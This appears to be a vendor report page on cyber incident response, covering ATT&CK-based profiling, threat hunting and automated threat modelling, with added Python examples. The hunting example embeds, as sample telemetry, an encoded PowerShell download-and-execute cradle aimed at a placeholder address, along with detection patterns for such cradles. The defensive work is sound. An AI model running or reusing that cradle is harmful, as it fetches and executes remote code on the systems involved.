Cyber Incident Response

What is cyber incident response?

Cyber incident response complements the advanced detection and response domain. It focuses on the technologies, processes and frameworks used to discover, eradicate and recover from cyber attacks and exploited vulnerabilities within an organization. It covers the key functions and operations expected of CERT/CSIRT teams and is an increasingly important part of a mature cybersecurity strategy in many organizations.

Why it matters

Identifying technological trends helps outline and prescribe threat discovery, attack mapping, threat modelling, and threat and vulnerability management.

[Figure: technology maturity radar for Cyber Incident Response. X-axis: expected time to adoption (0-2 years, 2-5 years, 5+ years); Y-axis: areas.]

© Eviden SAS 2024. All rights reserved.

The landscape

Adversary profiling with MITRE ATT&CK

Organizations are increasingly adopting the MITRE ATT&CK framework and moving to a threat-informed defense strategy. The framework helps organizations understand the behaviour, tactics and techniques of threat actors and tailor their protection strategies proactively, prioritizing detections and controls around the techniques the adversaries relevant to them actually use.

Threat hunting for proactive protection

With digital transformation in full swing and the attack surface continuously expanding, the old-school approach of "building the defenses and waiting in the trenches" is no longer sustainable. Neither is the static approach of waiting for published IoCs and running one-off searches for them. Organizations will have to adopt threat hunting, that is, proactively searching their environments for adversary behaviour that existing detections missed, complemented by red teaming exercises that identify weaknesses before threat actors exploit them. Red teaming gives organizations better insight into the weaknesses in their environments and lets them mitigate those proactively.
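To make the difference between "waiting for published IoCs" and a threat-informed hunt concrete, here is an added example (not code from the report or from Eviden) that runs both approaches over a handful of constructed process-creation events. The event data, hashes and the 198.51.100.7 address are constructed sample data; the ATT&CK technique IDs are the public MITRE identifiers for the behaviours the rules test for.

```python
"""Indicator lookup vs. behaviour-based hunt over constructed process-creation events.

Added example, not code from the report. Events, hashes and the 198.51.100.7
address (RFC 5737 documentation range) are constructed sample data.
"""
import base64
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Typical PowerShell download-and-execute cradle fragments.
DOWNLOAD_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-expression|\bIEX\b|Net\.WebClient")
# PowerShell accepts any unambiguous prefix of -EncodedCommand.
ENCODED_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def ps_encoded(script: str) -> str:
    """Encode a script the way PowerShell -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry; a real hunt would read EDR data or Sysmon event ID 1.
# The sha256 values are placeholders, not real file hashes.
EVENTS = [
    {"host": "ws01", "parent": "outlook.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + ps_encoded("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"),
     "sha256": "hash-of-powershell-exe"},
    {"host": "srv02", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "sha256": "hash-of-svchost-exe"},
    {"host": "ws03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
     "sha256": "hash-of-powershell-exe"},
    {"host": "ws04", "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -enc " + ps_encoded("Get-Date"),
     "sha256": "hash-of-powershell-exe"},
]

# A published indicator list: the hash of an earlier loader that this activity no longer uses.
KNOWN_BAD_HASHES = {"hash-of-last-months-loader"}


@dataclass(frozen=True)
class Finding:
    host: str
    technique: str  # MITRE ATT&CK technique ID
    detail: str


def ioc_hits(events, known_hashes):
    """The static approach from the text: look up published indicators in the telemetry."""
    return [ev["host"] for ev in events if ev["sha256"] in known_hashes]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Threat-informed hunt: test each event against adversary behaviours, not hashes."""
    findings = []
    for ev in events:
        parent, image = ev["parent"].lower(), ev["image"].lower()
        # Office application spawning a scripting host: the usual phishing-attachment chain.
        if parent in OFFICE_APPS and image in SHELLS:
            findings.append(Finding(ev["host"], "T1566.001", f"{parent} spawned {image}"))
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        # The payload of an encoded command never appears in plain text on the command line,
        # so a keyword search for "DownloadString" over raw logs would miss it.
        if DOWNLOAD_CRADLE.search(decoded):
            findings.append(Finding(ev["host"], "T1059.001", "encoded download cradle: " + decoded))
        else:
            findings.append(Finding(ev["host"], "T1027", "encoded PowerShell command: " + decoded))
    return findings


if __name__ == "__main__":
    print("IoC hits:", ioc_hits(EVENTS, KNOWN_BAD_HASHES))
    for f in hunt(EVENTS):
        print(f"{f.host}  {f.technique}  {f.detail}")
```

The indicator lookup returns nothing, because the hash on the list belongs to a loader this activity no longer uses, while the behavioural rules surface the Outlook-spawned, hidden-window, encoded download cradle on ws01 and flag the encoded (but benign) command on ws04 for triage; the administrator's signed-script run on ws03 produces no finding. Each rule maps to an ATT&CK technique, which is what lets the hunt be prioritized from an adversary profile rather than from whichever indicators were published last.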
Automated threat modelling

To prevent attacks and breaches efficiently, organizations will have to expand their use of risk-based approaches, especially automated threat modelling. It not only provides the means to build secure systems in a repeatable and methodical way with little or no human intervention, it also reduces the chances that an attack succeeds and the time and effort needed for implementation.

The remaining challenge is that automated threat modelling relies heavily on a very good understanding of the business infrastructure and processes: the output is only as good as the model it is fed. Errors or missing information in the model degrade the automated analysis and can lead to an improper security response during an attack. That is why organizations must leverage their own SOC detection, threat intelligence sharing and cyber deception tools to identify the risks first.

Key figures

46% of these technologies are either already adopted by most organizations or will be in the next two years.
46% of these technologies are expected to be adopted in the next 2 to 5 years.
8% of these technologies are transformational; widespread adoption will take more than 5 years.
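The caveat in the automated threat modelling section, that missing information in the model silently weakens the analysis, is easy to demonstrate with a small threat-model-as-code evaluator. This is an added example, not the report's or any vendor's tooling: the three-component system, its data flows and the STRIDE-style rules are constructed for illustration, and `None` marks a property the model does not document.

```python
"""Threat-model-as-code: derive STRIDE-style threats from declared data flows.

Added example, not the report's own tooling. The system, flows and rules are
constructed; `None` marks a property that the model does not document.
"""
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Flow:
    name: str
    src: str
    dst: str
    data: str                      # classification of the data carried
    crosses_boundary: bool         # flow leaves a trust zone
    encrypted: Optional[bool]      # None = not documented in the model
    authenticated: Optional[bool]
    logged: Optional[bool]


@dataclass(frozen=True)
class Threat:
    flow: str
    category: str
    reason: str


# Each rule: (STRIDE category, the flow property it depends on, predicate on that value).
RULES = [
    ("Information disclosure", "encrypted", lambda v, f: f.crosses_boundary and v is False),
    ("Tampering", "encrypted", lambda v, f: f.crosses_boundary and v is False),
    ("Spoofing", "authenticated", lambda v, f: f.crosses_boundary and v is False),
    ("Repudiation", "logged", lambda v, f: f.data in {"PII", "payment"} and v is False),
]

# Constructed architecture: a web application, its database and a third-party payment API.
# Nobody recorded whether the payment API call is authenticated.
MODEL = [
    Flow("browser->web", "Browser", "WebApp", "PII", True, True, True, True),
    Flow("web->db", "WebApp", "PostgreSQL", "PII", True, False, True, True),
    Flow("web->payments", "WebApp", "PaymentAPI", "payment", True, True, None, False),
]


def derive_threats(model, strict=True):
    """Evaluate every rule against every flow.

    strict=True reports each undocumented property a rule depends on as an
    "Incomplete model" item; strict=False skips such rules, which is how a gap in
    the model silently becomes a missed threat.
    """
    threats = []
    for f in model:
        reported_gaps = set()
        for category, prop, predicate in RULES:
            value = getattr(f, prop)
            if value is None:
                if strict and prop not in reported_gaps:
                    reported_gaps.add(prop)
                    threats.append(Threat(f.name, "Incomplete model",
                                          f"'{prop}' not documented; {category} cannot be evaluated"))
                continue
            if predicate(value, f):
                threats.append(Threat(f.name, category,
                                      f"{prop}={value} on {f.src}->{f.dst} carrying {f.data}"))
    return threats


if __name__ == "__main__":
    for mode in (True, False):
        print(f"strict={mode}")
        for t in derive_threats(MODEL, strict=mode):
            print(f"  {t.flow:15} {t.category:23} {t.reason}")
```

In strict mode the unencrypted database flow yields information-disclosure and tampering threats, the unlogged payment flow yields a repudiation threat, and the undocumented authentication on the payment flow is surfaced as a gap to go back and fill. In lax mode the same model produces the same three threats and nothing else, so a flow that may well be spoofable looks clean. Treating "unknown" as a finding rather than as "safe" is the difference between an automated model that tells you where its understanding of the business ends and one that hides it.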